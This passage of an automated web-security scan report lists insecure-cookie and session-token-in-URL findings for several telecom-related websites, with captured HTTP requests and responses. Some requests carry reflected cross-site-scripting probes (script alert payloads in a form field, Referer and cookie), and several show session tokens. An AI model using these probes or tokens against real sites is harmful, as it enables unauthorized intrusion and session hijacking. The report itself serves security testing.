Set-Cookie: JSESSIONID=AF295E2F29DA2AF72D8D0F33050CAE08; Path=/
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=; Expires=Fri, 13-May-2011 01:08:12 GMT; Path=/
Expires: Mon, 16 May 2011 05:08:12 GMT
ETag: W/"320710-1282158796000"
Last-Modified: Wed, 18 Aug 2010 19:13:16 GMT
Content-Type: text/css
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:11 GMT
Server: Apache-Coyote/1.1
Content-Length: 320710

/* $Id: style.css,v 1.287 2010/06/11 07:36:28 vijay Exp $ */
@import url("htmlarea.css");
@import url("combo.css");
@import url("common.css");
@import url("menu.css");
@import url("cal_style.css");
...[SNIP]...

8.12. https://lnp.activationnow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://lnp.activationnow.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: lnp.activationnow.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=qYpFNLnKf9fjDZKSkzRJcC5TnR1f7fVpwYdyvx2Q2sJRqJ1jTZD9!-1217543413; LNP=pabetaptel15p-lnp

Response

HTTP/1.1 404 Not Found
Set-Cookie: LNP=pabetaptel15p-lnp; path=/; expires=Thu, 12-May-2011 02:41:17 GMT
Connection: close
Date: Thu, 12 May 2011 00:50:21 GMT
Content-Length: 1214
Content-Type: text/html
X-Powered-By: Servlet/2.4 JSP/2.0

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN">
<HTML>
<HEAD>
<TITLE>Error 404--Not Found</TITLE>
<META NAME="GENERATOR" CONTENT="WebLogic Server">
</HEAD>
<BODY bgcolor="white">
<FONT FACE=He
...[SNIP]...

8.13. https://lnp.activationnow.com/lnp/jsp/logon/login.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://lnp.activationnow.com
Path:   /lnp/jsp/logon/login.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lnp/jsp/logon/login.jsp;jsessionid=qYpFNLnKf9fjDZKSkzRJcC5TnR1f7fVpwYdyvx2Q2sJRqJ1jTZD9!-1217543413 HTTP/1.1
Host: lnp.activationnow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LNP=pabetaptel15p-lnp; JSESSIONID=qYpFNLnKf9fjDZKSkzRJcC5TnR1f7fVpwYdyvx2Q2sJRqJ1jTZD9!-1217543413

Response

HTTP/1.1 200 OK
Set-Cookie: LNP=pabetaptel15p-lnp; path=/; expires=Thu, 12-May-2011 02:41:17 GMT
Cache-Control: no-store
Date: Thu, 12 May 2011 00:50:20 GMT
Pragma: no-cache
Content-Length: 6277
Content-Type: text/html; charset=ISO-8859-1
Expires: Wed, 31 Dec 1969 23:59:59 GMT
X-Powered-By: Servlet/2.4 JSP/2.0


<html>
<!--
/*
* @(#)login.jsp 5/1/2001 11:55:44 AM
*
* Copyright 2001-2009 Synchronoss Technologies, Inc. 1525 Valley Center Parkway,
* Bethlehem, Pennsylvania, 18017, U.S.A. All Rights R
...[SNIP]...

8.14. https://www.nationalnanpa.com/nas/security/user_reg_mail.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nationalnanpa.com
Path:   /nas/security/user_reg_mail.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nas/security/user_reg_mail.do?method=createNewMode HTTP/1.1
Host: www.nationalnanpa.com
Connection: keep-alive
Referer: http://nanpa.com/contact_us/mailing_list.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:05:46 GMT
Server: Apache
Set-Cookie: nanpaid=nqw6NLkhZBxKqvZ56hWlB5TyT0nTqDm8nJLB7XMLvr2plsh2B2xK!-242160596; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 13206


<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
<META NAME="CONTRIBUTORS"
...[SNIP]...

8.15. https://www.nationalnanpa.com/nas/security/user_reg_pre_mail.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nationalnanpa.com
Path:   /nas/security/user_reg_pre_mail.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nas/security/user_reg_pre_mail.do;nanpaid=0pprNLkhCcB1pQ1rBhlS98x58j4xyVXr4Nxq9fyyRKTyJpYpkTf9!-242160596?method=subscribeMailUser&nnsStateListHidden=AK&userStageModel.emailAddr=24c54%3Cscript%3Ealert(%22DORK%22)%3C/script%3E508ccbd11b05bf3ba HTTP/1.1
Host: www.nationalnanpa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://burp/show/5

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:52:55 GMT
Server: Apache
Set-Cookie: nanpaid=Ff09NLvHkTLnGvzy5qzXJQgg3zKQYMGpNzkq02Jv0DG1QM3cfYwz!1521367000; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 5270


<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
<META NAME="CONTRIBUTORS"
...[SNIP]...

9. Session token in URL  previous  next
There are 12 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


9.1. http://api.demandbase.com/api/v2/ip.json  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://api.demandbase.com
Path:   /api/v2/ip.json

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /api/v2/ip.json?token=b155ec5d50b5dcb41662f36b4d10a6f7702c87e6%20&callback=dbase_parse HTTP/1.1
Host: api.demandbase.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Api-Version: v2
Content-Type: application/javascript;charset=utf-8
Date: Thu, 12 May 2011 00:46:48 GMT
Server: Apache
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Connection: keep-alive
Content-Length: 699

dbase_parse({"city":"Birmingham","zip":"35210","latitude":33.537200927734,"company_name":"Media Visions","demandbase_sid":11633220,"company_size":"$5M - $10M","primary_sic":5065,"registry_city":"Dalla
...[SNIP]...

9.2. http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://connectedplanetonline.com
Path:   /bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/ HTTP/1.1
Host: connectedplanetonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:44 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Content-Type: text/html
Content-Length: 53276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v2/ip.json?token=b155ec5d50b5dcb41662f36b4d10a6f7702c87e6 &callback=dbase_parse"></script>
...[SNIP]...

9.3. http://images.smartname.com/scripts/google_afd_v2.js  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://images.smartname.com
Path:   /scripts/google_afd_v2.js

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /scripts/google_afd_v2.js HTTP/1.1
Host: images.smartname.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tis.org/

Response

HTTP/1.1 200 OK
Cartoon: : aaimage1-new
Content-Type: text/javascript
Accept-Ranges: bytes
ETag: "3880635792"
Last-Modified: Tue, 03 May 2011 19:40:02 GMT
Content-Length: 16625
Server: lighttpd/1.4.20
Date: Thu, 12 May 2011 00:43:08 GMT
Connection: close

// get param value from url
function getParam(name) {
var match = new RegExp(name + "=([^&]+)","i").exec(location.search);
if (match==null)
match = new RegExp(name + "=(.+)","i").e
...[SNIP]...
< google_categories.length; i++) {
popularCategories += '<a href="/?domain_name=' + google_afd_response.request.s +
'&q=' + encodeURIComponent(google_categories[i].term) +
'&token=' + google_categories[i].token + '">
' + google_categories[i].term + '</a>
...[SNIP]...

9.4. http://l.sharethis.com/pview  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&hostname=www.redskye911.com&location=%2Fe911_products%2F&url=http%3A%2F%2Fwww.redskye911.com%2Fe911_products%2F&sessionID=1305162436078.62285&fpc=a449df2-12fe1be4def-5e2048d0-1&ts1305162438995.0&r_sessionID=&hash_flag=&shr=&count=1 HTTP/1.1
Host: l.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/e911_products/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Thu, 12 May 2011 01:07:19 GMT
Connection: keep-alive


9.5. https://lnp.activationnow.com/lnp/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://lnp.activationnow.com
Path:   /lnp/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /lnp/ HTTP/1.1
Host: lnp.activationnow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: LNP=pabetaptel16p-lnp; path=/; expires=Thu, 12-May-2011 02:41:17 GMT
Cache-Control: no-cache="set-cookie"
Date: Thu, 12 May 2011 00:50:19 GMT
Location: https://lnp.activationnow.com/lnp/jsp/logon/login.jsp;jsessionid=1K1SNLnLjFQZhyyDNQgJVTzW15JLg5w8bm3GGTnfCV9CbzP3TmPv!1378410395
Set-Cookie: JSESSIONID=1K1SNLnLjFQZhyyDNQgJVTzW15JLg5w8bm3GGTnfCV9CbzP3TmPv!1378410395; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 457

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://lnp.activationnow.com/lnp/jsp/logon/login.jsp&#59;jsessionid=1K1SNLnLjFQZhyyDNQgJVTzW15JLg5w8bm3GGTnfCV9CbzP3TmPv!1378410395">http://lnp.activationnow.com/lnp/jsp/logon/login.jsp&#59;jsessionid=1K1SNLnLjFQZhyyDNQgJVTzW15JLg5w8bm3GGTnfCV9CbzP3TmPv!1378410395</a>
...[SNIP]...

9.6. https://lnp.activationnow.com/lnp/jsp/logon/login.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://lnp.activationnow.com
Path:   /lnp/jsp/logon/login.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /lnp/jsp/logon/login.jsp;jsessionid=qYpFNLnKf9fjDZKSkzRJcC5TnR1f7fVpwYdyvx2Q2sJRqJ1jTZD9!-1217543413 HTTP/1.1
Host: lnp.activationnow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LNP=pabetaptel15p-lnp; JSESSIONID=qYpFNLnKf9fjDZKSkzRJcC5TnR1f7fVpwYdyvx2Q2sJRqJ1jTZD9!-1217543413

Response

HTTP/1.1 200 OK
Set-Cookie: LNP=pabetaptel15p-lnp; path=/; expires=Thu, 12-May-2011 02:41:17 GMT
Cache-Control: no-store
Date: Thu, 12 May 2011 00:50:20 GMT
Pragma: no-cache
Content-Length: 6277
Content-Type: text/html; charset=ISO-8859-1
Expires: Wed, 31 Dec 1969 23:59:59 GMT
X-Powered-By: Servlet/2.4 JSP/2.0


<html>
<!--
/*
* @(#)login.jsp 5/1/2001 11:55:44 AM
*
* Copyright 2001-2009 Synchronoss Technologies, Inc. 1525 Valley Center Parkway,
* Bethlehem, Pennsylvania, 18017, U.S.A. All Rights R
...[SNIP]...

9.7. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/AuthenticationService.Authenticate

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /maps/api/js/AuthenticationService.Authenticate?1shttp%3A%2F%2Fwww.anpisolutions.com%2Fwholesale-voice-and-data-services%2Fsignaling-network-and-database-services%2Fgateway-services%2F&callback=_xdc_._xjyf04&token=74970 HTTP/1.1
Host: maps.googleapis.com
Proxy-Connection: keep-alive
Referer: http://www.anpisolutions.com/wholesale-voice-and-data-services/signaling-network-and-database-services/gateway-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Thu, 12 May 2011 00:46:24 GMT
Server: mafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 37

_xdc_._xjyf04 && _xdc_._xjyf04( [1] )

9.8. http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://support.sprint.com
Path:   /support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547 HTTP/1.1
Host: support.sprint.com
Proxy-Connection: keep-alive
Referer: http://shop2.sprint.com/en/support/faq/wlnp.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=34CE0D747C31107C188BD6527E05D4BF

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:04 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: Apache=173.193.214.243.1305161164637776; path=/
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
Set-Cookie: JSESSIONID=E03DE23D7995866D54F37C7F07F26CB3.support4; Path=/
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLFByb2plY3RJbnN0YWxsLzkuMCBbIERQU0xpY2Vuc2UvMCBCMkJMaWNlbnNlLzAgIF0=
cache-control: no-store, no-cache, must-revalidate, max-age=0
Set-Cookie: RecentlyViewedArticle=case-wh164052-20100420-140547:article_text; Expires=Sat, 11-Jun-2011 00:55:43 GMT; Path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 65521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml
...[SNIP]...
<li><a href="/support;jsessionid=E03DE23D7995866D54F37C7F07F26CB3.support4">Support</a>
...[SNIP]...
<li><a href="/support/servicepage;jsessionid=E03DE23D7995866D54F37C7F07F26CB3.support4">
                                       
                                           Services
                                   </a>
...[SNIP]...

9.9. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html?Action=Check_Out&Template=NANPA%20Gear&MarketName_W=&MarketCode_W=&AuthorName_W=&PublisherName_W=&ISBN_W=&Start_W=1&End_W=10&NumToShow=10&Volume_W=&KeywordID_W=&Time=-1775926634&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html?Action=Find_Store_Items&InvID_Web=9990&Template=NANPA%20Gear&MarketName_W=&MarketCode_W=&AuthorName_W=&PublisherName_W=&ISBN_W=&Start_W=1&End_W=10&NumToShow=10&Volume_W=&KeywordID_W=&Time=-1775934648&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s
Cookie: SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s; __utma=11887927.350769674.1305159223.1305159223.1305159223.1; __utmb=11887927.3.10.1305159223; __utmc=11887927; __utmz=11887927.1305159223.1.1.utmcsr=nanpa.org|utmccn=(referral)|utmcmd=referral|utmcct=/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 18

CheckOut=Check+Out

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:14:18 GMT
Connection: close
Last-Modified: Thu, 12 May 2011 00:14:18 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 30805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

   <head
...[SNIP]...

9.10. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nanpa.org/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php?type=js

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:13:38 GMT
Set-Cookie: SessionID=12387722t57wa9af1j74hos45z8o98ffd44jq45yyc2g314874sb627q4yk50a2g;Path=/
Connection: close
Last-Modified: Thu, 12 May 2011 00:13:38 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 18909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<p>

Members: Please

<a href="https://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/logon/logonstore.html?Time&#61;-1775957737&#38;SessionID&#61;12387722t57wa9af1j74hos45z8o98ffd44jq45yyc2g314874sb627q4yk50a2g">Login</a>
...[SNIP]...

9.11. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html?Action=Find_Store_Items&Time=-1775958525&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store
Cookie: SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s; __utma=11887927.350769674.1305159223.1305159223.1305159223.1; __utmb=11887927.1.10.1305159223; __utmc=11887927; __utmz=11887927.1305159223.1.1.utmcsr=nanpa.org|utmccn=(referral)|utmcmd=referral|utmcct=/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

Template=NANPA+Gear&MarketName_W=&bFindInventory=Find+Item%28s%29&NumToShow=10

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:14:02 GMT
Connection: close
Last-Modified: Thu, 12 May 2011 00:14:02 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 27135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...

9.12. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

POST /Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html?Action=Find_Store_Items&Time=-1775958525&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store
Cookie: SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s; __utma=11887927.350769674.1305159223.1305159223.1305159223.1; __utmb=11887927.1.10.1305159223; __utmc=11887927; __utmz=11887927.1305159223.1.1.utmcsr=nanpa.org|utmccn=(referral)|utmcmd=referral|utmcct=/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

Template=NANPA+Gear&MarketName_W=&bFindInventory=Find+Item%28s%29&NumToShow=10

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:14:02 GMT
Connection: close
Last-Modified: Thu, 12 May 2011 00:14:02 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 27135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
